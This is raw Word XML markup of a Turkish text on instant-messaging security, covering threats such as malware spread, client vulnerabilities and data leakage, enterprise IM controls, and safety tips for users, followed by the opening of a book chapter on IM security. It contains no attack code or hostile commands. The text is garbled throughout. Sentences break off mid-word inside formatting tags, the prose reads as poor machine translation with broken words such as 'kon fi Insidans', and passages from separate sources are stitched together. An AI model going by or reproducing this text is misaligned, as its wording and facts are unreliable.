19’u, mesajından çok daha fazla anlık mesaj gönderdiklerin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ş arkadaşlarına ve iş arkadaşlarına e-posta gönderirken, gençlerin yüzde 55'i yardım alıyo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aracılığıyla ev ödevleriyle. Ayrıca, işyerindeki IM kullanıcılarının yarıs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nin onları işte daha üretken kıldığına inanıyordu. Ancak, yaklaşık yüzde 79</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ofiste IM kullanan işçiler, kişisel konular için IM kullandıklarını belirtt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I.</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>POTANSİYEL TEHDİT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amu IM hizmetleri hızla yayılması için alternatif bir kanal haline geliyo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virüsler ve kötü amaçlı kod. Genel kamuya açık IM hizmetleri genellikle yerel değil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letilmekte olan bilgileri korumak için şifreleme v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msal içerik denetim filtreleri. Ayrıca, kapsamlı bir denetimin olmamas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z, belirli güvenlik veya yasal uyumluluk gerekliliklerini karşılamaya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servislerini kullanırken olası tehditler şunlar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1. Kötü Amaçlı Kodun Yayılması İçin Bir Araç</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in kurumsal kullanımı hem hacim hem de önem bakımından artmaktadır. IM kullanıcılar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daha hızlı bir karar alma sürecinden yararlanabileceklerini bildirir, daha yüks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verimlilik ve daha düşük telekomünikasyon maliyetleri. Aynı zamanda, IM tehdit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ipik olarak virüsler), saldırganlar değişmeye başladıkça hızla dikkat çekiyor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odakları daha iyi korunan e-posta sistemlerinden IM ağlarına kadar. İstenmeyen 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esajlar IM yoluyla da yayılabilir. Bir kullanıcının bir üzerinden aldığı spam</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Servislerine “spim” den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2. IM yazılımı Güvenlik Açıklar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Diğer herhangi bir yazılım uygulamasında olduğu gibi, popüler IM istemcilerinin bir geçmişi v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ortak güvenlik açıkları. Bir IM istemcisinin kurulması yen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lgisayar sistemine açıklar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3. Hassas Bilgilerin Sızıntıs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çin bir kamuya açık IM servisini kullanırken gizlilik önemli bir husustu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letişim. Genel IM şebekelerinde, kullanıcılar arasında mesaj alışveriş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nellikle servis sağlayıcılar tarafından kontrol edilen IM sunucusu çiftlikleri üzerinden yönlendir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endilerini. İstemci IM yazılımı eşler arası bir yeteneğe sahipse, kullanıcı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ohbet sunucularından geçmeden birbirleriyle iletişim kurun. Önemli değil</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Hangi mod kullanılıyorsa, IM trafiği gizlice dinlenmeye karşı savunmasızdır, çünkü</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çoğu kamuya açık IM istemcisi herhangi bir şifreleme özelliğine sahip değildir. Bu nedenl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yetkisiz bilgilerin yetkisiz kişilerce okunabileceği veya koklayabileceği mümkündü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llanıcılar. Halka açık IM servisleri kullanıldığında durum daha da kötü ola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luş dışındaki kişilerle iletişim kur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nel IM servisleri tarafından kullanılan protokoller genellikle saht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protokoller, çünkü standart güvenlikten kaçınmak için özel olarak tasarlanmışt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ontrolleri. IM istemcileri yalnızca SOCKS üzerinden bağlanacak şekilde yapılandırılamaz</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veya web proxy sunucuları, ancak protokol de kendi yolunu bulma yeteneğine sahipt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üvenlik duvarı üzerinden, TCP bağlantı noktası gibi açık bir bağlantı noktası arayara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80 veya HTTP istekleri içindeki trafiğini tünelleyer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tandart web trafiğinden tanınmayan. Komut dosyası ve dosya aktarım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sistemlerinin yetenekleri ayrıca bir kuruluşu sızıntılara maruz bıraka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hassas bilgi. Bu nedenle, kuruluşlar uygun</w:t>
      </w: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kullanımı ile ilgili politika ve kontrol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r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İzleme ve Tutma Baş Ağrılar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ohbet mesajlarını izlemek ve mesajları iş kayıtları için saklama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olay görev. Hangi anlık mesajların kaydedilmesi ve kaydedilmesi gerektiğine karar verm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ortamında büyük olasılıkla daha zo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elirli bir mesaj için anlamlı bir bağlam sağlamak için mesajlara ihtiyaç duyulu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5. Sorumlulu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r kamuya açık IM şebekesinde, IM gönderenlerin ve alıcıların kimlikleri olamaz.</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doğrulanmadı. Herkese açık IM hesapları, kaçırılma veya sahtekarlığa karşı savunmasız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eşru kullanıcılar ile bir konuşma taklit etmek için davetsiz misafir</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II.</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İŞLETME SEÇENEĞİNDEKİ ÖNEM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M ÇÖZÜM</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Şu anda piyasada mevcut bir dizi IM servis sağlayıcısı bulunmakta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endi dahili IM hizmetlerini oluşturma ve yönetme becerisini düzen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msal IM seçerken aşağıdaki güvenlik özellikleri göz önünde bulundurulm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IM) çözümü</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1. Kimlik Doğrulama Kontrolleri: Herhangi bir kurumsal IM çözümü entegre edilmeli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ibi şirketin mevcut kimlik doğrulama mekanizmaları il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icrosoft Active Directory ile arayüz oluşturm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2. Gizlilik Kontrolleri: Bütçe veya</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atış hacmi verileri kurumsal IM sisteminde iletile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IM ürünleri tüm mesajları korumak için güçlü şifreleme sağlam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şirket ağları içerisinde seyahat etm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3. Anti-Virüs Kontrolleri: Bir EIM ürünü,</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üm dosyaların EIM üzerinden aktarılmasını sağlamak için bir virüsten koruma çözümü</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anallar virüssüzdü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4. Günlük Kaydı / Denetleme Kontrolleri: Kuruluş içindeki tüm iletişim</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Çalışanların hizmeti kötüye kullanmadıklarından emin olmak için oturum açmanız gereke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veya belirli düzenleyici gereklilikleri yerine getirmek için. Seçilen EIM ürünü</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yrıca kuruluşun kayıt gereksinimlerini de karşılam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yrıca, kuruluşun kabul edilebilir bir IM kullanımı ve gizliliği tanımlaması gerek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politikası kullanın ve tüm çalışanlara IM'i işinde kullanmanın risklerini iletin. Eğer be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letişim şirket tarafından kaydedilmeli ve izlenmeli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yrıca çalışanlara açıkça dağıtılmalıdır</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V.</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>EN İYİ UYGULAMA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İŞLETİCİ KULLANICI İÇİN İPUÇLA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r IM sisteminin dağıtımında bir dizi potansiyel güvenlik riski bulunduğunda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kullanımı yalnızca ticari amaçlarla sınırl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Herhangi bir sistem (kamu veya özel) kurulmadan önce onay alınmalıdır. Eğer b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luş bir IM sistemi kullanmaya karar verirse, aşağıdaki güvenlik kontrol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uygulana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1. Tüm Güvenlik Prosedürlerine uyu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nel kural olarak, tüm ilgili güvenlik gereksinimleri </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>[dahil olmak üzer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Güvenlik Kuralları, Temel BT Güvenliği Politikası ve BT güvenliğ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Yönergeler (örtülü metin yalnızca ITGInfoStation sürümü için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kullanırken dikkat edilmesi gereken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2. Bir Sohbet Kullanım Politikası Geliştirin ve Tüm Sohbet Kullanıcılarına Açıkça Yay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r IM kullanım politikası, IM kullanımının kabul edilebilir olup olmadığını açıkça belirtmeli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luş içinde ve eğer öyleyse, kısıtlamaların ne olduğunu. IM kullanım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Politika teknoloji ve ürün tarafsız olmalıdır. IM ile oluşturulan mesaj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Olup olmamalarına bakılmaksızın, işletme kayıtları olarak görülmeli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amuya açık bir sistemde veya dahili bir kurumsal sistemde üretilir. Eğer kullanım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ticari amaçlar için, bir iç tutma politikası veya dış</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düzenlemelere uyulm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3. IM Hijyen Çözümlerini Uygulay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hijyen çözümleri, kuruluşlar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llanımı izleyerek, IM trafiğini yöneterek v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stenmeyen mesajları, bilgisayar virüslerini ve rahatsız edici şeyleri engellemek için içerik filtrelem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ateryallerin yanı sıra tüm IM mesajlarını denetim amacıyla kaydetm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4. Kullanıcıları En İyi IM Kullanımı konusunda Eğitin ve Masaüstü Korumasını Güçlendiri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tarafından şirket ağında ortaya çıkan en büyük tehditlerden biri IM tabanl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zararlı kod saldırıları. IM virüsleri genellikle ya olduğu gibi bulaş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çalıştırılabilir dosya ekleri veya IM metninde köprüler olarak mağdurları yönlendirm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zararlı web sunucuları. Çoğu durumda, bu virüsler otomatik olarak değil</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dam. Aksine, kurbanları ikna etmek için sosyal mühendislik taktiklerini kullanıyor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linmeyen dosyaları açmak veya şüpheli bağlantılara tıklamak içi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Özel IM hijyen ürünleri korumak ve yönetmek için bir çözümdü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kullanımı. Tüm dosya eklerinin yanı sıra etkin köprüleri de filtreleyer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ürünler kullanılan saldırı vektörlerinin büyük bir bölümünü etkili bir şekilde ortadan kaldıra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virüsleri ile. Masaüstü anti-virüs ürünleri de bunların çoğunu tespit etmeye yardımcı ola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hdit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on kullanıcıları gelen anlık mesajlaşma konusunda daha şüpheci olmaları için eğitme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endi arkadaş listelerinden olanlar bile, genel bir parçası olmal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tratejisi. Hızlı bir şekilde yama ekleyen yazılım açıkları hakkında genel önlem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ti-virüs yazılımı ve kişisel güvenlik duvarlarını çalıştırmak IM'ye karşı etkilid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hdit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Yukarıdakilerin ışığında, kullanıcı eğitimi ve masaüstü koruması alınmalıdı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nin şirkete dağıtımını planlarken hesaba kat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5. Genel IM kullanmak yerine Kurumsal IM (EIM) Çözümü uygulay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üşterile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hizmetleri iş amacıyla gerekliyse, kuruluş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endi Enterprise IM mimarisini kullanma olasılığını keşfedi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ğ ortamında. Bu, kapsamlı izlemeye izin verecekt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ve verilerin depolanması ve dahili kullanıcı ile ilgili güvencelerin sağlanmasına yardımcı olunmas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imlikler. Buna ek olarak, kapalı bir sistem hala anahtar için kullanılabilir hale getirilebil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üşterileri ve satıcıları dışardan alır, ancak tüm harici IM'lerin geçmesi gerek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zlenebileceği ve yönetilebileceği bir ağ geçidi. Kurumsal IM çözüm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ruluşlara, kendi müşterileri ve yerleşik sunucuları olan sunucular sağlamak</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ngelleme, günlüğe kaydetme, denetleme, izleme dahil kurumsal güvenlik özellikle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yönlendirme ve şifreleme</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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6ECF9"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6ECF9"/>
        </w:rPr>
        <w:t>6. IM Müşteri Korumas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ullanıcılar IM servisi tarafından sağlanan tüm şebeke servislerini devre dışı bırakmal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Gelen mesajlar / çağrılar / dosyalar alındığında tüm bildirimler devre dışı</w:t>
      </w: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aynakların paylaşımı ve mikrofonların ve videoların uzaktan etkinleştirilmesini devre dışı bırakma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>kameralar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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SON KULLANICILAR İÇİN İPUÇLAR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şağıdaki ipuçları, IM'yi düzenli iletişim olarak kullanan son kullanıcılar için tasarlanmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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raç</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1. IM istemcinizi dosya aktarımlarını otomatik olarak kabul edecek şekilde ayarlamayın. Yaparsan, se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virüs bulaşmış dosyaları otomatik olarak kabul etme riskine girdiğinizden emin olu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lmede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2. IM ile alınan herhangi bir dosyayı açmadan önce, göndereni doğrulamanız gereki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o dosyayı gerçekten size gönderdiğini söyledi. Ayrıca, dosyanın olduğundan emin olu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çmadan önce anti-virüs yazılımı tarafından tarandı.</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3. Güvenilmeyen / bilinmeyen durumdan gönderilen bir IM içindeki URL bağlantılarını asla tıklamay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kişileri. Tıklanan kullanıcılar tarafından yayılan virüs raporları v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IM URL’sind</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4. Asla kişisel bilgileri veya hassas bilgileri IM ile göndermeyin. Olsa bil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unu yapmak için zorunlu nedenler, hassas bilgilerin şifrelenmiş olmasını sağlayın.</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5. IM yazılımınızı (ve diğer sistem bileşenlerini) aşağıdak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n yeni yamalar, kişisel güvenlik duvarı korumasını etkinleştir ve virüsten koruma yazılımı yükle</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n yeni virüs imzalarına sahip yazılım ve kötü amaçlı kod tanımları gibi</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lgılama ve tamir motorlarının yanı sıra</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spacing w:before="102" w:after="102" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>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Anlık Mesajlaşma İçin Genel Güvenlik Endişeleri</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Gizlilik:</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> Anlık Mesajlaşma aracılığıyla iletilen bilgiler, mesaj alıcısına ulaşmadan önce birkaç açıklama noktasından geçer. Bu, mesajların güvenli olan veya olmayan sunuculardan ve ağlardan geçtiği anlamına gelir, bu nedenle gönderdiğiniz bilgilerin güvenli olmalarının garantisi yoktur. Sorunları karmaşıklaştırmak için, Anında Mesajlaşma servisleri genellikle oturumu sonlandırdıktan sonra sunucuda gizli bilgiler bırakabilen dosya paylaşım programları içerir.</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Şebeke Sorunları:</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> Anlık Mesajlaşma uygulamasıyla servis reddi saldırılarının riski çok daha fazladır. Hizmet reddi saldırıları meşru kullanıcıların kaynakları tüketmek, yapılandırmaları yok etmek ve ağ bileşenlerini değiştirmek için ağı aşırı kullanarak ağa erişmelerini önler. Davetsiz misafir mesajları arayabilir, birbirleriyle yasa dışı olarak iletişim kurmak için aygıtlar kurabilir ve işletim sisteminizin düzgün çalışması için ihtiyaç duyduğu diğer kaynakları kullanabilir.</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Kötü Amaçlı Yazılım:</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> Reklam yazılımı, casus yazılım, solucanlar, Truva atları ve diğer virüsler gibi </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>kötü</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> amaçlı yazılımlar, Anlık Mesajlaşma programınız aracılığıyla kolayca iletilebilir. Bu ayrıca, kendilerini meşru olarak gizleyen ve daha sonra kişisel bilgilerinizi açığa vurmanız için kandıran kimlik avı programlarını da içerir.</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Uygulama Exploits:</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tıpkı PC işletim sistemi güvenlik açıkları gibi, Anında Mesajlaşma uygulamalarının da bilgisayar korsanlarının yararlanabileceği kendi güvenlik açıkları olabilir. Meseleleri karmaşıklaştırmak için, Anında Mesajlaşma uygulamalarını destekleyen </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yazılım, üzerinde çalışması için Anlık Mesajlaşma uygulaması tarafından devralınabilecek yeni bir güvenlik açığı kümesi içerebilir.</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Mobil IM:</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> Kablosuz mobil cihazların kullanımının artması, PC'nizi Anlık Mesajlaşma için kullanmayla ilişkili olanların ötesinde yeni güvenlik açıkları ve güvenlik kaygıları yaratır. Mobil cihazlar ve kablosuz bağlantı sayesinde, bilgisayar korsanlarının bu uygulamalarla ilişkili güvenlik açıklarını tanıyarak e-posta iletilerinden ve kişi listenizdeki üyelerden yararlanmaları çok daha kolaydır.</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w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:tooltip="Güvenlik" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>güvenliği</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> ihlal etmek söz konusu olduğunda bilgisayar korsanları için yepyeni bir yol getiriyor çünkü daha fazla insan bu uygulamayı dosya aktarma dahil birçok farklı kullanım için kullanıyor. Bilgisayar korsanlarının PC'nize veya mobil cihazınıza uzaktan kolayca erişebilmelerini sağlayan yeni ve gelecek olan güvenlik açıkları keşfedildi.</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yı kullanmanın birçok yararı olsa da, bu uygulamayı kullanırken hiçbir güvenlik garantisi olmadığını unutmayın. Avantajlardan yararlandığınızdan ve bu uygulamayı dikkatli kullandığınızdan emin olu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spacing w:before="102" w:after="102" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Anlık Mesajlaşma Güvenlik Endişeleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="407"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Anlık Mesajlaşma, hem kişisel kullanım hem de iş kullanımı için çok popüler bir iletişim şekli haline geliyor. Anlık Mesajlaşma uygulamalarının popülaritesi ve rahatlığı nedeniyle, bu tür uygulamaları kullanmak için pek çok platform PC'ler ve mobil cihazlar için uygun hale gelmiştir. Bu, IM kullanıcıları için uygun olsa da, kötü niyetli saldırılar ve </w:t>
      </w:r>
      <w:hyperlink r:id="rId147" w:tooltip="Güvenlik" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>güvenlik</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> ihlalleri olasılığını da arttırır .</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Anlık mesajlaşma  Güvenlik sorunları</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William Hugh Murray, CISSP</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   Belirli bir uygulama ve çevre bağlamı dışında bir mekanizmanın güvenliği hakkında faydalı bir şey söylenemez.  </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 - Robert H. Courtney, Jr.   </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Gizlilik, hükümete sürveyansın maliyeti ile orantılı olarak değişir.</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   - Lawrence Lessig</w:t>
      </w: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 xml:space="preserve">Anlık mesajlaşma (IM), bir oyuncaktan bir kurumsal uygulamaya, evden odaya taşındı. </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sosyal altyapımızın bir parçası oldu ve ekonomik altyapımızın bir parçası olacak. Çoğu teknoloji gibi, birçok kullanım alanı vardır - bazıları iyi, bazıları kötü. Hem temel hem de uygulamaya bağlı sorunları vardır. Bu bölüm IM'yi açıklar ve uygulanmasına örnekler verir. İşlemi açıklar ve bazı örnek kullanımlarını inceler. Tipik tehditleri ve açıkları tespit eder ve IM'nin ortaya çıkardığı güvenlik sorunlarını inceler. Tipik güvenlik gereksinimlerini ve bunları karşılamak için mevcut kontrolleri tanımlar. Son olarak, kullanıcılar, operatörler, işletmeler ve ebeveynler için güvenlik önerileri yapa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iriş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve Arkapla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Anlık mesajlaşma veya sohbet, yaklaşık 15 senedir devam ediyor. Bununla birlikte, yaşamının çoğu için kullanımı seyrek olmuştur ve uygulamaları önemsizdir. America Online’ın hizmetine girmesiyle kullanımı hızla genişledi. Birçok çocuk için İnternetin ilk uygulaması ve oyundan sonra bilgisayarın ikinci uygulamasıydı. Her ne kadar birçok işletme hala dirense de, artık kültürün bir parçası. Tüketici pazarında ortaya çıkması ve işletme pazarına taşınması ilginç bir teknolojidir. Web'de gezinmeden önce olduğu gibi, IM kuruluştan aşağıdan yukarıya - kullanıcıdan kuruma - giriyor. Birçok kullanıcı birden tutamaklıdırlar ve birden hizmetlerine abone çünkü Orada 100 milyondan fazla gibi IM kullanıcıları olabilir ama, herhangi bir kon fi Insidans ile bilmek dif fi kült olduğunu. K. Peterse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eattle Times</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çok kullanıcının çoğu zaman iki veya daha fazla IM istemcisi açtığını bildirir. IM, yaşamı boyunca oldukça iyi huylu bir ortamda işletiliyordu. Yani, İnternet oldukça iyi huylu olduğu günlerde İnternet'te işletiliyordu. İnternetin genelinde olduğu gibi, iş ve hükümet partiye geç kaldı. 11 Eylül’de, ulus ve özellikle de New York’taki iletişim, çoğunlukla beklenmeyen bir yük nedeniyle ciddi bir şekilde bozuldu. Biri şehir dışına telefon açabilir ancak şehir içine çağrı yapamaz. WWW’deki çoğu haber sitesi pek çok talebe cevap vermedi; Cevaplar bir ya da iki satırla sınırlıydı. Şehirdeki yayın TV, birincil antenlerinin kaybolmasıyla bozuldu; sadece bir kaçının yedeği vardı. Kablolu TV ve şehir dışında yayın yapan tele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vizyonlar, kısmen oldukları için </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
